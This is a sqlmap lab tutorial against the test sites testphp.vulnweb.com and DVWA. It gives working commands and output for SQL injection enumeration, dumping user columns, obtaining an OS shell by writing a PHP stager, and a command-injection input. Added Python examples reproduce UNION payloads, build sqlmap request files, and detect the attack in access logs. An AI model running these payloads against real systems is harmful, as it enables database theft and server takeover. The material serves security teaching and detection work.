Sqlmap Topic

-u is followed by the URL to test.

You can also batch-process requests exported from Burp Suite: for form POST data, save the intercepted request to a file and pass it with -r.

Hands-on:

Target site: http://testphp.vulnweb.com/index.php

First find an injection point whose query results are displayed on the page.

Browse the links; clicking an artist link, for example, leads to the injection point: http://testphp.vulnweb.com/artists.php?artist=2

Append a ' to the URL. The following database error page appears, which means the parameter is worth trying to inject.

Next, test the injection point:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --batch

Result: the back-end DBMS is identified as MySQL.

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql --dbs --batch

Output: two databases are found.

[16:01:39] [INFO] retrieved: 'acuart'
available databases [2]:
[*] acuart
[*] information_schema

[16:01:39] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 16:01:39 /2020-08-06/


Enumerate the tables in the acuart database:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart --tables --batch

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Enumerate the columns of the users table:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart -T users --columns --batch

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

Dump the contents of selected columns (comma-separated list after -C):

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart -T users -C name,address,cart --dump --batch

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=2" --dbms mysql -D acuart -T artists -C aname,adesc --dump --batch
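To see what the commands above automate, here is an added example (mine, not from the page and not sqlmap's own code) that rebuilds the vulnerable artists.php?artist= lookup on an in-memory SQLite database and runs the quote probe, the boolean check, and the UNION queries behind --tables and --dump against it, next to a parameterised version that shrugs all of them off. SQLite, the table contents and the function names are my stand-ins; on the real MySQL target the catalogue is information_schema.tables / information_schema.columns rather than sqlite_master.

```python
import sqlite3

# Constructed stand-in for the artists table behind artists.php?artist=N.
# The real target is MySQL; SQLite's sqlite_master takes the place of
# MySQL's information_schema.tables here so the example runs offline.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE artists (artist_id INTEGER, aname TEXT, adesc TEXT);
CREATE TABLE users (uname TEXT, pass TEXT, cc TEXT);
INSERT INTO artists VALUES (1, 'r4w8173', 'first artist'), (2, 'Blad3', 'second artist');
INSERT INTO users VALUES ('test', 'test', '1234-5678-9012');
""")


def lookup_vulnerable(artist):
    """The bug class sqlmap found: the GET value is concatenated into the SQL text."""
    sql = "SELECT aname, adesc FROM artists WHERE artist_id = " + artist
    try:
        return {"rows": conn.execute(sql).fetchall(), "db_error": None}
    except sqlite3.Error as exc:           # the error page seen when a quote is appended
        return {"rows": [], "db_error": str(exc)}


def lookup_safe(artist):
    """Hardened form: validate the type and bind the value, so the statement shape is fixed."""
    try:
        artist_id = int(artist)
    except ValueError:                     # a real handler would answer 400 here
        return {"rows": [], "db_error": None}
    rows = conn.execute(
        "SELECT aname, adesc FROM artists WHERE artist_id = ?", (artist_id,)
    ).fetchall()
    return {"rows": rows, "db_error": None}


def error_probe(lookup):
    """Step 1 of the write-up: append a single quote and watch for a database error."""
    return lookup("2'")["db_error"] is not None


def boolean_probe(lookup):
    """Boolean-based check sqlmap runs for integer parameters: true vs false condition."""
    true_rows = lookup("2 AND 1=1")["rows"]
    false_rows = lookup("2 AND 1=2")["rows"]
    return bool(true_rows) and true_rows != false_rows


def union_enumerate_tables(lookup):
    """What --tables boils down to: UNION the schema catalogue into the page's result set."""
    payload = "-1 UNION SELECT name, type FROM sqlite_master WHERE type='table'-- "
    return sorted(row[0] for row in lookup(payload)["rows"])


def union_dump_column(lookup, table, column):
    """What -T users -C pass --dump boils down to."""
    payload = f"-1 UNION SELECT {column}, '' FROM {table}-- "
    return [row[0] for row in lookup(payload)["rows"]]


if __name__ == "__main__":
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterised", lookup_safe)):
        print(name, error_probe(fn), boolean_probe(fn),
              union_enumerate_tables(fn), union_dump_column(fn, "users", "pass"))
```

The payloads use the same column count as the original SELECT (two), which is why sqlmap first determines the number of columns before any UNION-based enumeration; the parameterised handler never reaches the database with anything but an integer, so every probe returns the same empty answer.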



Use Burp Suite to capture the request log and save it to a file.

Enable Burp's request logging: Project options -> Misc -> Logging -> Proxy -> Requests, and enter a file name, e.g. rizhi.

Browse other articles or other artists; every request is appended to the rizhi file.

Pick a few entries from the log, e.g. a POST and a GET request, save them on their own as 2.txt, and hand that file to sqlmap with -l:

sqlmap -l 2.txt --level 3 -v 2 --batch
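The steps above come down to two file formats: the raw request that `sqlmap -r` reads, and the Burp proxy log that `sqlmap -l` reads. The following added example (mine, not the page's, Burp's or sqlmap's code) renders a request file with sqlmap's `*` injection marker on the chosen parameter, and cuts the entries you want out of a proxy log and re-emits them in the same layout so the result can be saved as 2.txt. The log layout (entries fenced by lines of '=' with a "time  url  [ip]" banner) is assumed from memory of Burp's log files, and the sample log is constructed.

```python
import re
from urllib.parse import quote, urlsplit

# Constructed sample of a Burp proxy request log (two entries). The layout,
# entries fenced by lines of '=' with a "time  url  [ip]" banner, is assumed
# from memory of Burp's log files rather than taken from the page.
SAMPLE_BURP_LOG = """\
======================================================
16:01:39  http://testphp.vulnweb.com:80/artists.php?artist=2  [176.28.50.165]
======================================================
GET /artists.php?artist=2 HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0

======================================================
16:02:10  http://testphp.vulnweb.com:80/search.php?test=query  [176.28.50.165]
======================================================
POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

searchFor=x&goButton=go
======================================================
"""

SEPARATOR_RE = re.compile(r"^=+[ \t]*$", re.M)
BANNER_RE = re.compile(r"^\d{1,2}:\d{2}:\d{2}(?:\s*[AP]M)?\s+(https?://\S+)(?:\s+\[[^\]]*\])?\s*$")


def parse_burp_log(text):
    """Split a Burp proxy log into [{'banner', 'url', 'request'}] entries."""
    chunks = [c.strip("\r\n") for c in SEPARATOR_RE.split(text)]
    chunks = [c for c in chunks if c.strip()]
    entries = []
    i = 0
    while i + 1 < len(chunks):
        m = BANNER_RE.match(chunks[i].strip())
        if m:                               # banner line, next chunk is the raw request
            entries.append({"banner": chunks[i].strip(), "url": m.group(1), "request": chunks[i + 1]})
            i += 2
        else:
            i += 1
    return entries


def filter_burp_log(text, url_pattern):
    """Keep the entries whose URL matches url_pattern and re-emit Burp's layout,
    so the result can be saved (e.g. as 2.txt) and handed to `sqlmap -l`."""
    sep = "=" * 54
    out = []
    for entry in parse_burp_log(text):
        if re.search(url_pattern, entry["url"]):
            out += [sep, entry["banner"], sep, entry["request"], ""]
    out.append(sep)
    return "\n".join(out) + "\n"


def build_request_file(method, url, params, headers=None, inject=None):
    """Render one raw HTTP request in the form `sqlmap -r` reads. `inject` names
    the parameter to tag with sqlmap's '*' marker so only that value is tested."""
    u = urlsplit(url)
    path = u.path or "/"
    encoded = "&".join(
        f"{k}={quote(str(v), safe='')}" + ("*" if k == inject else "")
        for k, v in params.items()
    )
    query, body = u.query, ""
    if method.upper() == "GET":
        query = "&".join(part for part in (query, encoded) if part)
    else:
        body = encoded
    target = path + (f"?{query}" if query else "")
    lines = [f"{method.upper()} {target} HTTP/1.1", f"Host: {u.netloc}"]
    lines += [f"{k}: {v}" for k, v in (headers or {}).items()]
    if body:
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


if __name__ == "__main__":
    print(filter_burp_log(SAMPLE_BURP_LOG, r"search\.php"))
    print(build_request_file("POST", "http://testphp.vulnweb.com/search.php?test=query",
                             {"searchFor": "x", "goButton": "go"}, inject="searchFor"))
```

Write the output of filter_burp_log to 2.txt and run the `sqlmap -l 2.txt` command above; write the output of build_request_file to a file and pass it with `-r`. Without a `*` marker sqlmap tests every parameter it finds in the request, which is usually what you want on a first pass and what the commands on this page rely on.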



In DVWA:

Open Command Execution and enter 10.10.10.143 & pwd; the pwd output is the absolute path of the script's directory, which is needed later as the writable directory.

Open SQL Injection, submit a number, and capture the request with Burp Suite to obtain the session cookie.

Check whether the database user is a DBA:

sqlmap -u "http://10.10.10.143/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=507jbjeheke50u6uu15e7rg7a7" --is-dba

Next, use sqlmap to get an interactive OS shell; it does this by writing a PHP stager into the web directory.

Run:

sqlmap -u "http://10.10.10.143/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=507jbjeheke50u6uu15e7rg7a7" --os-shell

[18:23:12] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>

The application is written in PHP, so enter 4.

The following prompts appear:

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[18:25:06] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /var/www/htdocs, /usr/local/apache2/htdocs, /usr/local/www/data, /var/apache2/htdocs, /var/www/nginx-default, /srv/www/htdocs') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2

Choose 2.

please provide a comma separate list of absolute directory paths: /owaspbwa/dvwa-git/vulnerabilities/exec  (the path obtained from pwd earlier)

If the user is not a DBA (--is-dba returned false), sqlmap exits at this point. On MySQL the stager is written with SELECT ... INTO OUTFILE, so the database account also needs the FILE privilege, secure_file_priv must not block writing into the chosen directory, and that directory must be writable by the mysqld process; if any of these is missing, the shell cannot be planted even for a DBA.

If it succeeds, sqlmap confirms the upload and drops you at its os-shell> prompt.

Open the link vulnerabilities/exec/tmpujhum.php in a browser (the stager sqlmap wrote).
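From the other side of the wire, the chain above leaves a recognisable trail in the web server's access log: sqlmap's default User-Agent, the boolean, UNION and INTO OUTFILE payloads in the query string, and a request for the freshly written tmp....php stager. The following added example (mine, not part of the page or of sqlmap) runs those three checks over a few constructed Apache combined-format lines; the "tmp + five letters + .php" pattern is an assumption generalised from the page's tmpujhum.php, and the log lines are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines (not real traffic). The dropped
# file name copies the page's tmpujhum.php; the sqlmap User-Agent string is
# the tool's default, which --random-agent or --user-agent replaces.
SAMPLE_ACCESS_LOG = """\
10.10.10.1 - - [06/Aug/2020:18:23:12 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20AND%201%3D1&Submit=Submit HTTP/1.1" 200 4821 "-" "sqlmap/1.4.8#stable (http://sqlmap.org)"
10.10.10.1 - - [06/Aug/2020:18:25:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%20LIMIT%200,1%20INTO%20OUTFILE%20%27/owaspbwa/dvwa-git/vulnerabilities/exec/tmpujhum.php%27--%20&Submit=Submit HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
10.10.10.1 - - [06/Aug/2020:18:26:02 +0000] "GET /dvwa/vulnerabilities/exec/tmpujhum.php HTTP/1.1" 200 61 "-" "Mozilla/5.0"
10.10.10.2 - - [06/Aug/2020:18:30:00 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Keywords behind the steps on this page: boolean checks, UNION enumeration,
# information_schema reads and the INTO OUTFILE write that --os-shell relies on.
SQLI_RE = re.compile(
    r"\b(?:union\s+select|into\s+(?:out|dump)file|information_schema|"
    r"(?:and|or)\s+\d+\s*=\s*\d+|sleep\s*\(|benchmark\s*\()",
    re.I,
)
# Assumption: generalises the page's tmpujhum.php to a tmp + 5 letters + .php name.
DROPPED_FILE_RE = re.compile(r"/tmp[a-z]{5}\.php$")


def classify(line):
    """Return the reasons one access-log line looks like this sqlmap workflow (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap user-agent")
    if SQLI_RE.search(unquote_plus(m["target"])):      # decode before matching keywords
        reasons.append("sql keywords in request target")
    if DROPPED_FILE_RE.search(m["target"].split("?", 1)[0]):   # path only, not the query
        reasons.append("request for dropped stager file")
    return reasons


def scan(log_text):
    """Run classify over every line; returns [(line_number, reasons)] for the hits."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        reasons = classify(line)
        if reasons:
            hits.append((number, reasons))
    return hits


if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_ACCESS_LOG):
        print(number, ", ".join(reasons))
```

The User-Agent check is the weakest of the three, since `--random-agent` removes it; the INTO OUTFILE keyword and a 200 response for a file that did not exist a minute earlier are the signals worth alerting on, and the second one is also the cue to pull the file off the web root and read it.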